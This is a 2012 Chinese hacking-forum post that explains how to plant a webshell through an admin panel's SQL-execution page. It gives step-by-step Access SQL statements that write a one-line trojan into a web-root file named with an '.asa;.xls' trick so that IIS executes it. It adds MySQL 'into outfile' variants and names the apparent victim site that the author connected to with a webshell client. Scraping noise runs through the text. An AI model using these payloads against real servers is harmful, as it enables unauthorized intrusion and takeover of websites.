找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2000|回复: 0
打印 上一主题 下一主题

ACCESS执行SQL命令导出一句话SHELL

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:53:58 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
好不容易进了后台,发现啥上传啊。备份啊多木有。
$ u4 @. `& a# x6 qwebshell一直拿不到。后来翻了一下源码。有一个执行SQL命令的+ d1 Y. {8 }9 ~3 Q0 s9 f3 b
文件。可后台没显示这功能。直接填上文件名字,执行命令的选项出来了,
) e- _. x  e" P6 \然后就试用了下面的命令导出一句话木马。没想到成功了。命令方法如下:+ E- J6 K0 N0 g
1.create table cmd (a varchar(50))
' F* N# d3 `4 M4 X& v2.insert into cmd (a) values (‘‘), t- F$ Z: S7 D, z; ^
3.select * into [a] in ‘D:\wwwroot\www.koohik.com\hacker.asa;.xls’ ‘excel 4.0;’ from cmd
" ]2 p& U& }! d+ V" ^) _(把表cmd的内容导出为物理路径的一个EXCEL文件)7 N7 v: W( O( l, l2 r3 R3 B
4.drop table cmd
, L$ I3 F5 ]) v. Q, Q0 e利用IIS的BUG成功拿到了WEBSHELL。
5 L3 Q, ^4 |2 @6 P; t: G3 x9 }$ w% e
; ^3 |. |3 Z/ m6 L; ]直接菜刀里连接http://www.chouwazi.com/data/xiao.asp;xiao.xls一句话( A5 B: V, Z* T1 _7 ?1 o: g

" u7 n. g" p! K7 I' F  SQL语句意思解释:
, v# M: s% U2 ~& D9 {  第一句
) b: d. J$ L1 q+ o2 g4 C4 n  建立一个有一个A字段的表 表名为cmd 字段类型为字符 长度为50
/ v$ ]) I' ^  U! I2 f! c( \; X: d* O
  第二句: p0 b# j- m5 I' R
  在表cmd的a字段插入一句话木马
+ x  f! t+ s6 d4 b  第三句
' w& P  e0 m+ i2 C  把cmd表a的内容导出到路径e:\host\chouwazi.com\web\data\的EXCEL文件6 x0 S* G- R( S; S( x
2 F) k3 m" p5 R7 Y/ B" X1 ]9 C
  第四句
# n1 n2 W% E7 k( G9 {( y  删除建立的cmd表
5 ]9 U" W. A) n5 ]* t1 s
+ ?; M, C: @5 ^  n8 k  以下内容为测试:8 t: P* Q7 O* u9 e
  Access利用后台SQL执行命令功能导出WebShell:
5 a8 m3 j/ Y8 t$ a$ T% f/ J  这个更简单:
6 v3 q' p( X3 q# p* M0 y5 d  [ol][li]Select 'asp一句话木马' into [vote] in 'd:/chouwazi.com/x.asp;.xls' 'excel 8.0;' from vote [/li][/ol]
; G) ^* a% [% H! G) c! z) q  或者, g5 |; J4 W9 j2 `
  [ol][li]Select 'php一句话木马' into outfile 'F:/wwwroot/chouwazi.com/eval.php'; [/li][/ol]9 |6 P  }! X+ i3 P  }

3 E! O- S' E1 |. M7 U9 Y% S  后台有执行SQL语句功能(vote为已知表段), C4 ^, |6 j# x. a, Y
  希望对大家有所帮助拿shell的又一个思路, @# m% L  G2 c$ E* V* P/ W
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表